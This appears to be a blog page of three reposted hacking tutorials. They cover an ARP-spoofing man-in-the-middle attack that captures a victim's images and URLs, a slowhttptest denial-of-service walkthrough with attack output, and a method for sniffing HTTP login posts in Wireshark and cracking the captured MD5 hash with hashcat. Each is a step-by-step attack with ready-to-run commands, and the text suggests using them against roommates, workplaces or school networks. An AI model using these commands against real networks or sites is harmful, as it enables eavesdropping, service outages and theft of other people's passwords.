Man in the middle attack

Kali Linux Man In The Middle Attack

Posted by Vishnu Valentino in Hacking Tutorial | 22 Comments

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

Here is the video in case you can't get the text explanations above.

Conclusion:

1. To change or spoof the attacker MAC address, you can view the tutorial about how to change kali linux MAC address.

2. Driftnet or Urlsnarf was hard to detect, but you can try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.

Hope you found it useful 

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.PsvwCOt8.dpuf

original post
http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.PsvwCOt8.dpbs

Read More

Attack a website using slowhttptest from Linux and Mac

Attack a website using slowhttptest from Linux and Mac

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin – a Unix-like environment and command-line interface for Microsoft Windows.

It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.

Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.

Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly.

Contents [hide]

• Installation
  • Installation for Kali Linux users
  • For other Linux distributions
  • Mac OS X
  • Linux
• Usage
  • Example of usage in slow message body mode
  • Example of usage in slowloris mode
  • Example of usage in slow read mode with probing through proxy
• Output
  • Sample output for a real test
  • From attackers end
  • From victim server end:
• Further reading and references
  • To share or not to share! Well, just share then!!
  • Related

Installation

Installation for Kali Linux users

For Kali Linux users, install via apt-get .. (life is good!)

root@kali:~# apt-get install slowhttptest 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)     
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali:~#

For other Linux distributions

The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install:

$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed.

You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.

Alternatively

Mac OS X

Using Homebrew:

brew update && brew install slowhttptest

Linux

Try your favorite package manager, some of them are aware of slowhttptest (Like Kali Linux).

Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages

Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Same test with graph

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Same test with graph

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Output

Depends on verbosity level, output can be either as simple as heartbeat message generated every 5 seconds showing status of connections with verbosity level 1, or full traffic dump with verbosity level 4.

-g option would generate both CSV file and interactive HTML based on Google Chart Tools.

Here is a sample screenshot of generated HTML page

that contains graphically represented connections states and server availability intervals, and gives the picture on how particular server behaves under specific load within given time frame.

CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs.

Last message you’ll see is the exit status that hints for possible possible program termination reasons:

“Hit test time limit”	program reached the time limit specified with -l argument
“No open connections left”	peer closed all connections
“Cannot establish connection”	no connections were established during first N seconds of the test, where N is either value of -i argument, or 10, if not specified. This would happen if there is no route to host or remote peer is down
“Connection refused”	remote peer doesn’t accept connections (from you only? Use proxy to probe) on specified port
“Cancelled by user”	you pressed Ctrl-C or sent SIGINT in some other way
“Unexpected error”	should never happen

Sample output for a real test

I’ve done this test in a sample server and this is what I’ve seen from both attacking and victim end.

From attackers end

So, I am collection stats and attacking www.localhost.com with 1000 connections.

root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3

Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy 

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html

From victim server end:

rootuser@localhost [/home]# pgrep httpd | wc -l
151

Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)

And of course I want to see how what’s in my /var/log/messages

rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections

As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure).

To make it worse, you can do it from Windows, Linux and even a Mac… I am starting to wonder whether you can do it using a jailbroken iphone6 Plus OTA (4gplus is FAST) … or a Galaxy Note 4.. I can do it using my old Galaxy Nexus (rooted) and of course good old Raspberry Pi …

original post

http://www.darkmoreops.com/2014/09/23/attacking-website-using-slowhttptest/

Read More

Hack website password using WireShark

Hack website password using WireShark 

good article

Did you knew every time you fill in your username and password on a website and press ENTER, you are sending your password. Well, of course you know that. How else you’re going to authenticate yourself to the website?? But, (yes, there’s a small BUT here).. when a website allows you to authenticate using HTTP (PlainText), it is very simple to capture that traffic and later analyze that from any machine over LAN (and even Internet). That means someone can hack website password for any site that is using HTTP protocol for authentication. Well, to do it over Internet, you need to be able to sit on a Gateway or central HUB (BGP routers would do – if you go access and the traffic is routed via that).

But to do it from a LAN is easy and at the same time makes you wonder, how insecure HTTP really is. You could be doing to to your roommate, Work Network or even School, College, University network assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode.

So lets try this on a simple website. I will hide part of the website name (just for the fact that they are nice people and I respect their privacy.). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/Physical machines.

p.s. Note that some routers doesn’t broadcast traffic, so it might fail for those particular ones.

Contents [hide]

• Step 1: Start Wireshark and capture traffic
• Step 2: Filter captured traffic for POST data
  • Why POST only?
• Step 3: Analyze POST data for username and password
• Step 4: Identify hash type
• Step 5: Cracking MD5 hashed password
  • • Cracking password hashes
• Conclusion
  • To share or not to share! Well, just share then!!
  • Related

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application >  Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.

Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

Usually you see a lot of data in Wireshark. However are are only interested on POST data.

Why POST only?

Because when you type in your username, password and press the Login button, it generates a a POST method (in short – you’re sending data to the remote server).

To filter all traffic and locate POST data, type in the following in the filter section

http.request.method == "POST"

See screenshot below. It is showing 1 POST event.

Step 3: Analyze POST data for username and password

Now right click on that line and select Follow TCP Steam

This will open a new Window that contains something like this:

HTTP/1.1 302 Found 
Date: Mon, 10 Nov 2014 23:52:21 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.3 
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" 
Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Location: loggedin.php 
Content-Length: 0 
Connection: close 
Content-Type: text/html; charset=UTF-8

I’ve highlighted the user name and password field.

So in this case,

1. username: sampleuser
2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.

Note that some website’s doesn’t hash password’s at all even during sign on. For those, you’ve already got the username and password. In this case, let’s go bit far and identify this hash value

Step 4: Identify hash type

I will use hash-identifier to find out which type of hash is that. Open terminal and type in hash-identifier and paste the hash value. hash-identifier will give you possible matches.

See screenshot below:

Now one thing for sure, we know it’s not a Domain Cached Credential. So it must be a MD5 hash value.

I can crack that using hashcat or cudahashcat. There’s an extensive guide on how to do that here.

Step 5: Cracking MD5 hashed password

I can easily crack this simple password using hashcat or similar softwares.

root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Because this was a simple password that existed in my password list, hashcat cracked it very easily.

Cracking password hashes

• Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat

Out final outcome looks like this:

1. username: sampleuser
2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion

Well, to be honest it’s not possible for every website owner to implement SSL to secure password, proper SSL’s cost you upto 1500$ per URL. But the least website owners (public ones where anyone can register) should do is to implement hashing during login-procedures. In that way, at least the password is hashed and that adds one more hurdle for someone else can hack website password so easily.

Enjoy and use this guide responsibly.

credit goes to  original article

http://www.darkmoreops.com/2014/11/11/hack-website-password-using-wireshark/

Read More